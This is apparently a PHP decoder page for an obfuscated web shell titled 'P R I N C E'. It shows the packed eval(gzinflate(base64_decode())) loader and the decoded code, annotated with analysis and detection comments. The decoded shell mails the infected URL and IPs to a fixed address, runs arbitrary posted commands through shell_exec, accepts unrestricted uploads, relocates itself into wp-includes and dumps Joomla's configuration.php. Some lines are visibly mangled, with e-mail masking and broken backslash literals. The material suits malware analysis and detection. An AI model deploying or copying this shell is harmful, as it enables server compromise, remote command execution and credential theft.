
PHP Decode

<?php eval(gzinflate(base64_decode("rVfrT9tIEP9cJP6HYZvWiY48AF3FmZi2CuEaqSRcEu4LIMuxN8k..

Decoded Output download

<?php ?><html><head>
<link rel="SHORTCUT ICON" href="https://flagspot.net/images/r/ro%29.gif">
<style type="text/css">
<!--
.send {font-family: "Courier New", Courier, monospace;border:none; font-size:18px; background-color:#FFFFFF; font-black:bold}
#Layer1 {
	position:absolute;
	left:200px;
	top:3px;
	width:800px;
	height:633px;
	z-index:1;
	margin-top: 3%;
	margin-right: 3%;
	right: 20%;
	bottom: auto;
	margin-bottom: 3%;
	margin-left: 3%;
	border: thin solid #0066CC;
	font-family:"Courier New", Courier, monospace;
	overflow: auto;
}
.style1 {
	color: #0000CC;
	font-weight: bold;
}
-->
</style>

<body>
<div id="Layer1"><br><br><table width="100%" border="0">
  <tr>
    <td><div align="center" class="style1"><blink>P R I N C E </blink></div></td>
  </tr>
</table>

  <table width="100%" border="0" cellspacing="20">
    <tr>
      <td><?
// Analysis note: first-visit beacon of the decoded payload. On a request where
// the 'bajak' session key is unset, it e-mails the location of this script and
// basic host details to a fixed recipient.
// Tries to reset disable_functions to its configured startup value; '@' hides any warning.
@ini_restore("disable_functions");
// NOTE(review): no session_start() is visible in this listing, so whether
// $_SESSION persists between requests cannot be confirmed from here; if it does
// not, this branch (and the mail below) would run on every request.
if (!isset($_SESSION['bajak']))	{
// $visitcount is assigned here and not read anywhere in the visible code.
$visitcount = 0;
// Host header and request URI of the current request: together, the URL of this script.
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
// Used as the mail subject below: "Shell Injector ", a newline, then host + URI.
$body = "Shell Injector 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get  disable!';
// Address of the server and address of the client making this request.
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
// Sends the beacon. The recipient shown as "[email protected]" appears to be the
// hosting page's e-mail masking, not the original literal, so the real address
// is not recoverable from this listing.
// Detection: outbound mail from the web server whose subject starts with
// "Shell Injector" or whose body starts with "Shell Result http://". The message
// discloses the script URL, the safe_mode state and both addresses.
mail("[email protected]", "$body","Shell Result http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
// On later visits the key is only incremented; no mail is sent in this branch.
else {$_SESSION['bajak']++;};
// Analysis note: relocation routine. When the query string contains a 'clone'
// parameter, the running script is renamed (moved, not copied) to
// <DOCUMENT_ROOT>/wp-includes/wp-info.php, so the file disappears from its
// original path.
// Detection: requests carrying '?clone', and a wp-info.php inside wp-includes.
// NOTE(review): compare wp-includes against a clean copy of the installed
// WordPress release to confirm that file is not part of core.
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-info.php";
rename($source, $desti);
}
// Analysis note: reconnaissance banner. Every page load prints the safe_mode
// state, numeric uid/gid with the script owner's name, the php_uname() string
// and the disable_functions status into the response body.
// Detection: responses containing the title "P R I N C E" together with the
// "SAFE_MODE :", "User : uid=", "Uname :" and "Disable Functions :" labels.
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>P R I N C E</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
// get_current_user() is the owner of this script file; the same name is printed
// after both the uid and the gid.
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get  disable!';
// NOTE(review): "[email protected]_get" on the next line is an extraction artifact
// (text around the '@' was replaced by the hosting page's e-mail masking). As
// printed the expression is not valid PHP; presumably the original assigned the
// result of @ini_get('disable_functions') to a variable. Confirm against the raw payload.
if((@function_exists('ini_get')) && (''==([email protected]_get('disable_functions')))){echo "NONE";}else{echo "$df";}
// Returns getcwd() with a trailing directory separator appended when the last
// separator found is not already the final character. '/' is tried first, then
// a backslash. Nothing is returned when neither search succeeds (strrpos()
// yielding false or position 0 both fail the truthiness test).
// NOTE(review): the two '\' literals below are malformed as printed (a backslash
// directly before the closing quote escapes it), so this listing does not parse
// as shown. This is presumably how the decoder rendered an escaped backslash;
// confirm against the raw payload.
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
// Analysis note: operator UI and file-drop handler. Two forms are rendered: a
// command form (fields 'cmd' and 'command', the latter with value "cok") and a
// multipart upload form (fields 'submit', 'userfile', 'newname').
// Detection: POST requests to a PHP file carrying these field names.
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
// Destination directory is the script's working directory (pwd() is defined elsewhere in this listing).
$uploaddir = pwd();
// File name comes from the 'newname' field, else from the client-supplied
// upload name; neither is validated or restricted before use.
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
// The status text is driven by a second move_uploaded_file() call on the same
// temp file, and "Upload Failed" is printed when that call returns true. The
// message in a captured response is therefore not evidence of whether a file
// was written; check the directory contents and file timestamps instead.
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
// Analysis note: remote command execution. When the 'command' field is posted,
// the 'cmd' field is passed unmodified to shell_exec() and the output is echoed
// into the page. On every other request the page runs 'ls -la', so each page
// load spawns a shell from the PHP process.
// Detection: the web server or PHP worker process spawning a shell or 'ls -la';
// POST bodies containing 'cmd=' together with 'command=cok'.
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

// Analysis note: configuration disclosure. When the query string contains a
// 'baca' parameter, the file two directories above the working directory named
// configuration.php is read and echoed verbatim into the response.
// NOTE(review): configuration.php is the file name Joomla uses for its site
// configuration, which is presumably the target. If this shell was reachable,
// treat any database credentials and secrets in that file as exposed and rotate them.
// Detection: requests carrying '?baca'.
if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}
?><?


Original Code

<?php
// Analysis note: loader stage. The single statement below base64-decodes an
// embedded string, inflates it with gzinflate() and passes the result to eval(),
// so the payload never appears as readable PHP in the file on disk. The code
// listed under "Decoded Output" on this page is what eval() receives.
// Detection: the nested eval(gzinflate(base64_decode(...))) call chain with a
// long string literal is a common static signature for packed PHP. Pair file
// scanning with integrity monitoring of the web root, because the packed blob
// itself differs between samples.

eval(gzinflate(base64_decode("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")));

?>

Function Calls

base64_decode 1
gzinflate 1

Variables

None

Stats

MD5 7825546e0fbf809e8d1711d7e929dedd
Eval Count 1
Decode Time 100 ms